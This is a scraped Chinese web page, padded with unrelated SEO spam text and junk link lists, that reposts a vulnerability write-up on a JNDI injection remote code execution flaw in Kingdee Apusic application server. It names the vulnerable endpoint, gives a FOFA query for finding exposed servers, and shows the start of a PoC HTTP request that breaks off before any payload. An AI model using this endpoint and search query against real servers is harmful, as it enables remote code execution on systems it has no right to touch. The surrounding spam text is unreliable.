当前位置: 首页 > news >正文

优化前网站现状分析企业管理说白了是干嘛的

优化前网站现状分析,企业管理说白了是干嘛的,公司企业网络宣传设计方案,建站费用参考0x01 产品简介 金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。 0x02 漏洞概述 由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份…

0x01 产品简介

金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

0x02 漏洞概述

由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)

0x03 影响范围

影响版本

金蝶Apusic应用服务器 <= V9.0 SP7

不受影响版本

金蝶Apusic应用服务器 > V9.0 SP7

0x04 复现环境

FOFA:app="Apusic应用服务器"

0x05 漏洞复现

PoC

POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
http://www.yayakq.cn/news/495828/

相关文章:

  • wordpress做定制T恤的网站广州关键词优化外包
  • 篡改 网站 支付接口网站行高
  • muse做网站网上招聘网站开发报告
  • 网站内容建设流程做网站的项目流程
  • 做网站怎么办营业执照湖南做网站kaodezhu
  • html学校网站模板网页无法访问怎么回事
  • 法治建设网站模块邢台专业做移动网站
  • 福州网站外包湖南环保设备公司中企动力网站建设技术支持
  • 黄冈网站免费投放平台免费下载网络营销推广实例
  • 怎么做粉丝福利购网站黄骅市属于沧州市吗
  • 吉安做网站优化wordpress支付宝
  • 2023网站推广入口做架构图的网站
  • 中小企业门户网站的建设方案重庆网站建设论文
  • 湘潭网站制作建设甘肃省住房与建设厅网站
  • 品牌工厂网站建设网页编辑框
  • 西安做网站一般多少钱怎么查房产信息查询
  • 网站建设职业情况网站建设哪专业
  • 网站怎么做不违法做一个网站可以卖东西嘛
  • 网站建设预算表制作今天国际最新消息新闻
  • 做我女朋友程序网站公司推广业务哪个平台好
  • 一键免费做网站中国建筑网建筑通
  • 网站运营建站优化专家wordpress 主动提交
  • 农机局网站建设方案静态网页模板网站
  • 手机精品网站建设淘客wordpress数据
  • wordpress 站点地图河北seo网络优化师
  • 学会网站制作要多久权威发布新冠用药
  • 男女做暖暖试看网站成都网站建设略奥网络
  • seo网站优化培训厂家报价wordpress最新文章模板
  • 滕州网站建设滕州制作网页软件免费
  • 重庆神态网站建设网站建设虚线代码